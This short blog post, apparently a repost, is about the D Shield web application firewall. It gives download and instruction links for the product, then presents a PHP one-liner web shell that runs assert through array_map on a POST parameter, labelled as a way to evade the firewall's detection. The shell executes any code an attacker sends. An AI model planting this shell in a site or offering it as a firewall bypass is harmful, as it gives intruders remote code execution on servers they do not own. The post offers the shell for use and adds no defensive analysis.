Application Security - Security Equipment -Waf series - soft Waf-D Shield

installation

Download 
http://www.d99net.net/down/d_safe_2.1.5.2.zip

Instructions for use

http://www.d99net.net/News.asp?id=106

Free to kill

array_map |  assert

<?php 
function test($a, $b)
{
    array_map($a, $b);
}
test(assert, array($_POST['x']));
?> 

 

Guess you like

Origin www.cnblogs.com/AtesetEnginner/p/11356491.html